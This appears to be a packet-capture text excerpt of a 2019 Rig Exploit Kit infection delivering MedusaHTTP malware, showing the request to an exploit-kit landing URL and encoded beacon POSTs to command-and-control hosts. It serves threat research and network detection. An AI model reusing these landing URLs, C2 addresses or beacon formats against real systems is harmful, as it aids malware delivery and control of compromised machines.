Text Example

Rig Exploit Kit EK Loads MedusaHTTP Malware Trojan Backdoor Flash Exploit PCAP File Download Traffic Sample

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0
E..(.a….^…%s
..e.P……..U.P…. ..
2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$.b….Y…%s
..e.P……..U.P…cL..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 12 Aug 2019 20:57:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 45973
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2019-08-12 16:59:38.271526 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268: HTTP: POST /forums/members/api.jsp HTTP/1.1
E..4..@…..
..e.w…..P.R.az.e.P….%..POST /forums/members/api.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Host: cdnshop78.world
Content-Length: 192
Expect: 100-continue
Connection: Keep-Alive

2019-08-12 16:59:38.271686 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 269, win 64240, length 0
E..(.b….o{.w..
..e.P..z.e..R.mP….O..
2019-08-12 16:59:38.626952 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 269:461, ack 1, win 64240, length 192: HTTP
E…..@….B
..e.w…..P.R.mz.e.P…….xyz=Jn72I3lUOoD6/K%2BBOVBU21CCWaMR0pT/MMMybhkcYzKf0Fxhd5iX/gM81s2/ry7/68WwIwZcdWQ6itJCp/2EjmcHZrxDMiwaQmK6aOtIdjcivuIb26kGZv0gTBGSgrc2LVstLUlWLVstMl4VcmXCxtXRM%2Bb999Q62gnpsw9gRcO404kDv36jb7g=
2019-08-12 16:59:38.627077 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 461, win 64240, length 0
E..(.c….oz.w..
..e.P..z.e..R.-P…….
2019-08-12 16:59:38.701682 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 1:26, ack 461, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
E..A.d….o`.w..
..e.P..z.e..R.-P…N[..HTTP/1.1 100 Continue

2019-08-12 16:59:38.807386 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [.], ack 26, win 64215, length 0
E..(..@…..
..e.w…..P.R.-z.f.P…….
2019-08-12 16:59:39.444787 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 26:381, ack 461, win 64240, length 355: HTTP: HTTP/1.1 404 Not Found
E….f….n..w..
..e.P..z.f..R.-P…)m..HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 13 Aug 2019 00:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.39

2019-08-12 18:02:50.728872 IP 10.8.12.101.49205 > 195.22.26.248.80: Flags [P.], seq 246:434, ack 26, win 64215, length 188: HTTP
E….j@…./
..e…..5.P!p…)iiP…….xyz=Rdbf7Sz9YfcZXmTqimFyqnuXh9Qh2EokgRxWjlW6eKlVYMP/0Ie66coOHRDqh72wYWFpR4xyzrqwauM0ArlQyO1qB/flAxIl7E5s3wAGYyWQvmPGYIc2JkmQEzK0NIxSLVstLUlWLVst5B2FNeT80ZFfKTucqMUWcv06uvZYrUmVLNhFF/hGmbs=
2019-08-12 18:02:50.729083 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [.], ack 434, win 64240, length 0
E..(……K_….
..e.P.5.)ii!p.aP….~..
2019-08-12 18:02:50.900794 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [FP.], seq 26:283, ack 434, win 64240, length 257: HTTP: HTTP/1.1 200 OK
E..)……J]….
..e.P.5.)ii!p.aP….F..HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Aug 2019 22:02:47 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=98d119f0da644d3d3e6a3eec09296b9b|173.166.146.112|1565647367|1565647367|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
